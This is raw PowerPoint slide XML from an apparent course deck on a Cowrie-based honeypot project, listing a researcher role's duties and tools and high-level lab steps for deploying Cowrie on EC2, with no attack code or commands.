          <p:cNvPr id="22" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6873121"/>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Behavioral fingerprinting implementation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="7182683"/>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Real-time alerting and notification system</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>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7437" y="5371028"/>
            <a:ext cx="396835" cy="396835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="59662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Real-World Skills</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="6309479"/>
            <a:ext cx="4215408" cy="508159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Threat detection, security monitoring, incident response automation</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792718"/>
            <a:ext cx="11365825" cy="496133"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Security Researcher - Attack Trends &amp; Intelligence Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="31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606391"/>
            <a:ext cx="396835" cy="396835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790"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Primary Focus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="2544842"/>
            <a:ext cx="4215289" cy="254079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Geographic &amp; Threat Intelligence, Attack Surface analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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37" y="1606391"/>
            <a:ext cx="396835" cy="396835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437"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Key Responsibilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="2544842"/>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Analyze attack trends and compare with external threat intelligence feeds</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="3108484"/>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Document malware samples and attack methodologies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="3672126"/>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Research threat actor attribution and geographic patterns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="4235767"/>
            <a:ext cx="42154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Create comprehensive threat landscape reports</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="4545330"/>
            <a:ext cx="4215408"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Correlate PatriotPot data with global threat intelligence</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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1203" y="1606391"/>
            <a:ext cx="396835" cy="396835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621203" y="220158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Tools You'll Master</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621203" y="2544842"/>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Attack heatmap analysis and geographic threat visualization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621203" y="3108484"/>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Threat intelligence correlation and external feed integration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621203" y="3672126"/>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Statistical analysis of attack patterns and frequencies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621203" y="3981688"/>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Malware analysis and documentation techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>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371028"/>
            <a:ext cx="396835" cy="396835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="59662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Sprint Deliverables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6309479"/>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Research paper section on observed attack trends</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6619042"/>
            <a:ext cx="4215289"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Threat actor attribution and geographic analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6928604"/>
            <a:ext cx="421528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EFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Comparative analysis with global threat intelligence feeds</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>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7437" y="5371028"/>
            <a:ext cx="396835" cy="396835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="59662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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Real-World Skills</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5207437" y="6309479"/>
            <a:ext cx="4215408" cy="508159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Threat research, intelligence analysis, academic research methodology</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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787003"/>
            <a:ext cx="4618315" cy="531614"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Today's Hands-On Lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="963930" y="1913930"/>
            <a:ext cx="170021" cy="765453"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 150088"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="1802249"/>
            <a:ext cx="510302" cy="510302"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 89594"/>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306" y="1929884"/>
            <a:ext cx="255151" cy="255151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1474113" y="1828800"/>
            <a:ext cx="2844998"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Step 1: Launch EC2 instance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1474113" y="2196584"/>
            <a:ext cx="12362498" cy="272177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>(t2.micro, Amazon Linux 2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219081" y="3104674"/>
            <a:ext cx="170021" cy="765453"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 150088"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1048941" y="2992993"/>
            <a:ext cx="510302" cy="510302"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 89594"/>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6457" y="3120628"/>
            <a:ext cx="255151" cy="255151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1729264" y="3019544"/>
            <a:ext cx="7525226"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Step 2: Install Cowrie from GitHub - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="58FF0D"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/cowrie/cowrie.git</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1474232" y="4295418"/>
            <a:ext cx="170021" cy="765453"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 150088"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304092" y="4183737"/>
            <a:ext cx="510302" cy="510302"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 89594"/>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4"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31608" y="4311372"/>
            <a:ext cx="255151" cy="255151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1984415" y="4210288"/>
            <a:ext cx="4469725"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Step 3: Configure ports and security groups</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1729383" y="5486162"/>
            <a:ext cx="170021" cy="765453"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 150088"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1559243" y="5374481"/>
            <a:ext cx="510302" cy="510302"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 89594"/>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18" name="Image 3"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86758" y="5502116"/>
            <a:ext cx="255151" cy="255151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2239566" y="5401032"/>
            <a:ext cx="3478292"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Step 4: Test with simulated attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1899524" y="6702575"/>
            <a:ext cx="170021" cy="765453"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 150088"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1729383" y="6623197"/>
            <a:ext cx="510302" cy="510302"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 89594"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="222222"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="3B3B3B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="15240" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Image 4"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56839" y="6888467"/>
            <a:ext cx="255151" cy="255151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1984415" y="6591776"/>
            <a:ext cx="3747373" cy="265747"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2050"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Step 5: View logs and analyze results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64394"/>
            <a:ext cx="4820007" cy="602456"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Project Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="1852374"/>
            <a:ext cx="6424970" cy="2659975"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10872"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="030303"/>
          </a:solidFill>
          <a:ln w="22860">
            <a:solidFill>
              <a:srgbClr val="3B3B3B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="17780" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="816650" y="1875234"/>
            <a:ext cx="6379250" cy="578406"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 45258"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="222222"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw dist="1778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73" y="2015966"/>
            <a:ext cx="289203" cy="289203"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009412" y="2646402"/>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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>What is Cowrie?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009412" y="3063240"/>
            <a:ext cx="5993725" cy="1233487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Cowrie is a special "trap" computer (a honeypot) designed to look like a real system. It pretends to be a computer accessible via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
